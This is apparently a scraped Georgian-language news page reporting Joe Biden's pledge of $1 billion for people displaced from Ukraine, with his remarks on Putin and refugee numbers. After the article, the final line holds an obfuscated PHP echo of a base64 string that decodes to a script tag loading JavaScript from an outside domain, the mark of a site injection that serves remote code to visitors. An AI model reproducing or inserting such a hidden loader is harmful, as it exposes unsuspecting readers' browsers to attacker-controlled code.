celsiusi
ავერსი საქკაბელი
ამერიკის შეერთებული შტატების პრეზიდენტმა ჯო ბაიდენმა განაცხადა, რომ უკრაინიდან იძულებით გადაადგილებული პირების დასახმარებლად ქვეყანა 1 მილიარდ დოლარს გამოყოფს.
 
მან, ვლადიმირ პუტინს კიდევ ერთხელ უწოდა "ომის კრიმინალი კაცი". ბაიდენმა აღნიშნა, რომ იმაზე საშინელი არაფერია, ვიდრე უყურებდე ბავშვის ტანჯვას.
 
"ყველაზე მნიშვნელოვანი დემოკრატიაში ერთიანობის შენარჩუნებაა. ჩვენ ხელი უნდა შევუშალოთ იმ ნგრევას, რომელსაც ეს ომის კრიმინალი კაცი აკეთებს. სწორედ ამიტომ ვსჯით რუსეთს ისტორიაში ყველაზე მასშტაბური სანქციებით.
 
მე ადრეც მინახავს ლტოლვილთა ბანაკები და ნგრევის შედეგები. ვფიქრობ, იმაზე საშინელი არაფერია, ვიდრე უყურებდე ბავშვის ტანჯვას. მე აქ ჩამოვედი, რომ ჩემი თვალით მენახა ეს ჰუმანიტარული კრიზისი.
 
10 მილიონი ადამიანი იძულებით გადაადგილებული პირია. 3.8 მილიონი უკრაინელი თავს სხვადასხვა ქვეყანას აფარებს, საიდანაც ნახევარი ბავშვია. ჩვენ ვხედავთ რამხელა წინააღმდეგობას უწევენ უკრაინელები და როგორ დიდ გამბედაობას იჩენენ ისინი მტერთან ბრძოლაში.
 
ჩვენ მილიარდ დოლარს გამოვყოფთ იმ ადამიანების დასახმარებლად, რომლებიც იძულებით გადაადგილებული პირები არიან. ამავეს გააკეთებენ ჩვენი კანადელი მეგობრებიც," - განაცხადა ჯო ბაიდენმა.
876
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");